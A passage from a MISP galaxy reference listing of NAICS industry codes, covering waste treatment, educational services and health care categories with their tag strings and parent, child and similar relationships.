  • parent-of: misp-galaxy:naics="562219" with estimative-language:likelihood-probability="likely"

56221

Waste Treatment and Disposal

The tag is: misp-galaxy:naics="56221"

56221 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562211

Hazardous Waste Treatment and Disposal

The tag is: misp-galaxy:naics="562211"

562211 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562212

Solid Waste Landfill

The tag is: misp-galaxy:naics="562212"

562212 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562213

Solid Waste Combustors and Incinerators

The tag is: misp-galaxy:naics="562213"

562213 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

562219

Other Nonhazardous Waste Treatment and Disposal

The tag is: misp-galaxy:naics="562219"

562219 has relationships with:

  • child-of: misp-galaxy:naics="5622" with estimative-language:likelihood-probability="likely"

5629

Remediation and Other Waste Management Services

The tag is: misp-galaxy:naics="5629"

5629 has relationships with:

  • child-of: misp-galaxy:naics="562" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56291" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56292" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="56299" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="562998" with estimative-language:likelihood-probability="likely"

56291

Remediation Services

The tag is: misp-galaxy:naics="56291"

56291 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="562910" with estimative-language:likelihood-probability="likely"

562910

Remediation Services

The tag is: misp-galaxy:naics="562910"

562910 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56291" with estimative-language:likelihood-probability="likely"

56292

Materials Recovery Facilities

The tag is: misp-galaxy:naics="56292"

56292 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="562920" with estimative-language:likelihood-probability="likely"

562920

Materials Recovery Facilities

The tag is: misp-galaxy:naics="562920"

562920 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="56292" with estimative-language:likelihood-probability="likely"

56299

All Other Waste Management Services

The tag is: misp-galaxy:naics="56299"

56299 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

562991

Septic Tank and Related Services

The tag is: misp-galaxy:naics="562991"

562991 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

562998

All Other Miscellaneous Waste Management Services

The tag is: misp-galaxy:naics="562998"

562998 has relationships with:

  • child-of: misp-galaxy:naics="5629" with estimative-language:likelihood-probability="likely"

61

Educational Services

The tag is: misp-galaxy:naics="61"

61 has relationships with:

  • parent-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

611

Educational Services

The tag is: misp-galaxy:naics="611"

611 has relationships with:

  • child-of: misp-galaxy:naics="61" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"

6111

Elementary and Secondary Schools

The tag is: misp-galaxy:naics="6111"

6111 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611110" with estimative-language:likelihood-probability="likely"

61111

Elementary and Secondary Schools

The tag is: misp-galaxy:naics="61111"

61111 has relationships with:

  • child-of: misp-galaxy:naics="6111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611110" with estimative-language:likelihood-probability="likely"

611110

Elementary and Secondary Schools

The tag is: misp-galaxy:naics="611110"

611110 has relationships with:

  • child-of: misp-galaxy:naics="6111" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61111" with estimative-language:likelihood-probability="likely"

6112

Junior Colleges

The tag is: misp-galaxy:naics="6112"

6112 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611210" with estimative-language:likelihood-probability="likely"

61121

Junior Colleges

The tag is: misp-galaxy:naics="61121"

61121 has relationships with:

  • child-of: misp-galaxy:naics="6112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611210" with estimative-language:likelihood-probability="likely"

611210

Junior Colleges

The tag is: misp-galaxy:naics="611210"

611210 has relationships with:

  • child-of: misp-galaxy:naics="6112" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61121" with estimative-language:likelihood-probability="likely"

6113

Colleges, Universities, and Professional Schools

The tag is: misp-galaxy:naics="6113"

6113 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611310" with estimative-language:likelihood-probability="likely"

61131

Colleges, Universities, and Professional Schools

The tag is: misp-galaxy:naics="61131"

61131 has relationships with:

  • child-of: misp-galaxy:naics="6113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611310" with estimative-language:likelihood-probability="likely"

611310

Colleges, Universities, and Professional Schools

The tag is: misp-galaxy:naics="611310"

611310 has relationships with:

  • child-of: misp-galaxy:naics="6113" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61131" with estimative-language:likelihood-probability="likely"

6114

Business Schools and Computer and Management Training

The tag is: misp-galaxy:naics="6114"

6114 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61143" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611430" with estimative-language:likelihood-probability="likely"

61141

Business and Secretarial Schools

The tag is: misp-galaxy:naics="61141"

61141 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611410" with estimative-language:likelihood-probability="likely"

611410

Business and Secretarial Schools

The tag is: misp-galaxy:naics="611410"

611410 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61141" with estimative-language:likelihood-probability="likely"

61142

Computer Training

The tag is: misp-galaxy:naics="61142"

61142 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611420" with estimative-language:likelihood-probability="likely"

611420

Computer Training

The tag is: misp-galaxy:naics="611420"

611420 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61142" with estimative-language:likelihood-probability="likely"

61143

Professional and Management Development Training

The tag is: misp-galaxy:naics="61143"

61143 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611430" with estimative-language:likelihood-probability="likely"

611430

Professional and Management Development Training

The tag is: misp-galaxy:naics="611430"

611430 has relationships with:

  • child-of: misp-galaxy:naics="6114" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61143" with estimative-language:likelihood-probability="likely"

6115

Technical and Trade Schools

The tag is: misp-galaxy:naics="6115"

6115 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611519" with estimative-language:likelihood-probability="likely"

61151

Technical and Trade Schools

The tag is: misp-galaxy:naics="61151"

61151 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611511

Cosmetology and Barber Schools

The tag is: misp-galaxy:naics="611511"

611511 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611512

Flight Training

The tag is: misp-galaxy:naics="611512"

611512 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611513

Apprenticeship Training

The tag is: misp-galaxy:naics="611513"

611513 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

611519

Other Technical and Trade Schools

The tag is: misp-galaxy:naics="611519"

611519 has relationships with:

  • child-of: misp-galaxy:naics="6115" with estimative-language:likelihood-probability="likely"

6116

Other Schools and Instruction

The tag is: misp-galaxy:naics="6116"

6116 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611610" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61162" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611620" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61163" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611630" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61169" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611691" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611692" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611699" with estimative-language:likelihood-probability="likely"

61161

Fine Arts Schools

The tag is: misp-galaxy:naics="61161"

61161 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611610" with estimative-language:likelihood-probability="likely"

611610

Fine Arts Schools

The tag is: misp-galaxy:naics="611610"

611610 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61161" with estimative-language:likelihood-probability="likely"

61162

Sports and Recreation Instruction

The tag is: misp-galaxy:naics="61162"

61162 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611620" with estimative-language:likelihood-probability="likely"

611620

Sports and Recreation Instruction

The tag is: misp-galaxy:naics="611620"

611620 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61162" with estimative-language:likelihood-probability="likely"

61163

Language Schools

The tag is: misp-galaxy:naics="61163"

61163 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611630" with estimative-language:likelihood-probability="likely"

611630

Language Schools

The tag is: misp-galaxy:naics="611630"

611630 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61163" with estimative-language:likelihood-probability="likely"

61169

All Other Schools and Instruction

The tag is: misp-galaxy:naics="61169"

61169 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

611691

Exam Preparation and Tutoring

The tag is: misp-galaxy:naics="611691"

611691 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

611692

Automobile Driving Schools

The tag is: misp-galaxy:naics="611692"

611692 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

611699

All Other Miscellaneous Schools and Instruction

The tag is: misp-galaxy:naics="611699"

611699 has relationships with:

  • child-of: misp-galaxy:naics="6116" with estimative-language:likelihood-probability="likely"

6117

Educational Support Services

The tag is: misp-galaxy:naics="6117"

6117 has relationships with:

  • child-of: misp-galaxy:naics="611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="61171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="611710" with estimative-language:likelihood-probability="likely"

61171

Educational Support Services

The tag is: misp-galaxy:naics="61171"

61171 has relationships with:

  • child-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="611710" with estimative-language:likelihood-probability="likely"

611710

Educational Support Services

The tag is: misp-galaxy:naics="611710"

611710 has relationships with:

  • child-of: misp-galaxy:naics="6117" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="61171" with estimative-language:likelihood-probability="likely"

62

Health Care and Social Assistance

The tag is: misp-galaxy:naics="62"

62 has relationships with:

  • parent-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="623" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="624" with estimative-language:likelihood-probability="likely"

621

Ambulatory Health Care Services

The tag is: misp-galaxy:naics="621"

621 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6216" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

6211

Offices of Physicians

The tag is: misp-galaxy:naics="6211"

6211 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621112" with estimative-language:likelihood-probability="likely"

62111

Offices of Physicians

The tag is: misp-galaxy:naics="62111"

62111 has relationships with:

  • child-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

621111

Offices of Physicians (except Mental Health Specialists)

The tag is: misp-galaxy:naics="621111"

621111 has relationships with:

  • child-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

621112

Offices of Physicians, Mental Health Specialists

The tag is: misp-galaxy:naics="621112"

621112 has relationships with:

  • child-of: misp-galaxy:naics="6211" with estimative-language:likelihood-probability="likely"

6212

Offices of Dentists

The tag is: misp-galaxy:naics="6212"

6212 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621210" with estimative-language:likelihood-probability="likely"

62121

Offices of Dentists

The tag is: misp-galaxy:naics="62121"

62121 has relationships with:

  • child-of: misp-galaxy:naics="6212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621210" with estimative-language:likelihood-probability="likely"

621210

Offices of Dentists

The tag is: misp-galaxy:naics="621210"

621210 has relationships with:

  • child-of: misp-galaxy:naics="6212" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62121" with estimative-language:likelihood-probability="likely"

6213

Offices of Other Health Practitioners

The tag is: misp-galaxy:naics="6213"

6213 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62133" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62134" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621340" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62139" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621399" with estimative-language:likelihood-probability="likely"

62131

Offices of Chiropractors

The tag is: misp-galaxy:naics="62131"

62131 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621310" with estimative-language:likelihood-probability="likely"

621310

Offices of Chiropractors

The tag is: misp-galaxy:naics="621310"

621310 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62131" with estimative-language:likelihood-probability="likely"

62132

Offices of Optometrists

The tag is: misp-galaxy:naics="62132"

62132 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621320" with estimative-language:likelihood-probability="likely"

621320

Offices of Optometrists

The tag is: misp-galaxy:naics="621320"

621320 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62132" with estimative-language:likelihood-probability="likely"

62133

Offices of Mental Health Practitioners (except Physicians)

The tag is: misp-galaxy:naics="62133"

62133 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621330" with estimative-language:likelihood-probability="likely"

621330

Offices of Mental Health Practitioners (except Physicians)

The tag is: misp-galaxy:naics="621330"

621330 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62133" with estimative-language:likelihood-probability="likely"

62134

Offices of Physical, Occupational and Speech Therapists, and Audiologists

The tag is: misp-galaxy:naics="62134"

62134 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621340" with estimative-language:likelihood-probability="likely"

621340

Offices of Physical, Occupational and Speech Therapists, and Audiologists

The tag is: misp-galaxy:naics="621340"

621340 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62134" with estimative-language:likelihood-probability="likely"

62139

Offices of All Other Health Practitioners

The tag is: misp-galaxy:naics="62139"

62139 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

621391

Offices of Podiatrists

The tag is: misp-galaxy:naics="621391"

621391 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

621399

Offices of All Other Miscellaneous Health Practitioners

The tag is: misp-galaxy:naics="621399"

621399 has relationships with:

  • child-of: misp-galaxy:naics="6213" with estimative-language:likelihood-probability="likely"

6214

Outpatient Care Centers

The tag is: misp-galaxy:naics="6214"

6214 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62141" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62142" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621420" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62149" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621493" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621498" with estimative-language:likelihood-probability="likely"

62141

Family Planning Centers

The tag is: misp-galaxy:naics="62141"

62141 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621410" with estimative-language:likelihood-probability="likely"

621410

Family Planning Centers

The tag is: misp-galaxy:naics="621410"

621410 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62141" with estimative-language:likelihood-probability="likely"

62142

Outpatient Mental Health and Substance Abuse Centers

The tag is: misp-galaxy:naics="62142"

62142 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621420" with estimative-language:likelihood-probability="likely"

621420

Outpatient Mental Health and Substance Abuse Centers

The tag is: misp-galaxy:naics="621420"

621420 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62142" with estimative-language:likelihood-probability="likely"

62149

Other Outpatient Care Centers

The tag is: misp-galaxy:naics="62149"

62149 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621491

HMO Medical Centers

The tag is: misp-galaxy:naics="621491"

621491 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621492

Kidney Dialysis Centers

The tag is: misp-galaxy:naics="621492"

621492 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621493

Freestanding Ambulatory Surgical and Emergency Centers

The tag is: misp-galaxy:naics="621493"

621493 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

621498

All Other Outpatient Care Centers

The tag is: misp-galaxy:naics="621498"

621498 has relationships with:

  • child-of: misp-galaxy:naics="6214" with estimative-language:likelihood-probability="likely"

6215

Medical and Diagnostic Laboratories

The tag is: misp-galaxy:naics="6215"

6215 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62151" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621511" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621512" with estimative-language:likelihood-probability="likely"

62151

Medical and Diagnostic Laboratories

The tag is: misp-galaxy:naics="62151"

62151 has relationships with:

  • child-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

621511

Medical Laboratories

The tag is: misp-galaxy:naics="621511"

621511 has relationships with:

  • child-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

621512

Diagnostic Imaging Centers

The tag is: misp-galaxy:naics="621512"

621512 has relationships with:

  • child-of: misp-galaxy:naics="6215" with estimative-language:likelihood-probability="likely"

6216

Home Health Care Services

The tag is: misp-galaxy:naics="6216"

6216 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621610" with estimative-language:likelihood-probability="likely"

62161

Home Health Care Services

The tag is: misp-galaxy:naics="62161"

62161 has relationships with:

  • child-of: misp-galaxy:naics="6216" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621610" with estimative-language:likelihood-probability="likely"

621610

Home Health Care Services

The tag is: misp-galaxy:naics="621610"

621610 has relationships with:

  • child-of: misp-galaxy:naics="6216" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62161" with estimative-language:likelihood-probability="likely"

6219

Other Ambulatory Health Care Services

The tag is: misp-galaxy:naics="6219"

6219 has relationships with:

  • child-of: misp-galaxy:naics="621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62199" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="621999" with estimative-language:likelihood-probability="likely"

62191

Ambulance Services

The tag is: misp-galaxy:naics="62191"

62191 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="621910" with estimative-language:likelihood-probability="likely"

621910

Ambulance Services

The tag is: misp-galaxy:naics="621910"

621910 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62191" with estimative-language:likelihood-probability="likely"

62199

All Other Ambulatory Health Care Services

The tag is: misp-galaxy:naics="62199"

62199 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

621991

Blood and Organ Banks

The tag is: misp-galaxy:naics="621991"

621991 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

621999

All Other Miscellaneous Ambulatory Health Care Services

The tag is: misp-galaxy:naics="621999"

621999 has relationships with:

  • child-of: misp-galaxy:naics="6219" with estimative-language:likelihood-probability="likely"

622

Hospitals

The tag is: misp-galaxy:naics="622"

622 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6222" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6223" with estimative-language:likelihood-probability="likely"

6221

General Medical and Surgical Hospitals

The tag is: misp-galaxy:naics="6221"

6221 has relationships with:

  • child-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622110" with estimative-language:likelihood-probability="likely"

62211

General Medical and Surgical Hospitals

The tag is: misp-galaxy:naics="62211"

62211 has relationships with:

  • child-of: misp-galaxy:naics="6221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="622110" with estimative-language:likelihood-probability="likely"

622110

General Medical and Surgical Hospitals

The tag is: misp-galaxy:naics="622110"

622110 has relationships with:

  • child-of: misp-galaxy:naics="6221" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62211" with estimative-language:likelihood-probability="likely"

6222

Psychiatric and Substance Abuse Hospitals

The tag is: misp-galaxy:naics="6222"

6222 has relationships with:

  • child-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622210" with estimative-language:likelihood-probability="likely"

62221

Psychiatric and Substance Abuse Hospitals

The tag is: misp-galaxy:naics="62221"

62221 has relationships with:

  • child-of: misp-galaxy:naics="6222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="622210" with estimative-language:likelihood-probability="likely"

622210

Psychiatric and Substance Abuse Hospitals

The tag is: misp-galaxy:naics="622210"

622210 has relationships with:

  • child-of: misp-galaxy:naics="6222" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62221" with estimative-language:likelihood-probability="likely"

6223

Specialty (except Psychiatric and Substance Abuse) Hospitals

The tag is: misp-galaxy:naics="6223"

6223 has relationships with:

  • child-of: misp-galaxy:naics="622" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="62231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="622310" with estimative-language:likelihood-probability="likely"

62231

Specialty (except Psychiatric and Substance Abuse) Hospitals

The tag is: misp-galaxy:naics="62231"

62231 has relationships with:

  • child-of: misp-galaxy:naics="6223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="622310" with estimative-language:likelihood-probability="likely"

622310

Specialty (except Psychiatric and Substance Abuse) Hospitals

The tag is: misp-galaxy:naics="622310"

622310 has relationships with:

  • child-of: misp-galaxy:naics="6223" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="62231" with estimative-language:likelihood-probability="likely"

623

Nursing and Residential Care Facilities

The tag is: misp-galaxy:naics="623"

623 has relationships with:

  • child-of: misp-galaxy:naics="62" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="6239" with estimative-language:likelihood-probability="likely"

6231

Nursing Care Facilities (Skilled Nursing Facilities)

The tag is: misp-galaxy:naics="6231"

6231 has relationships with:

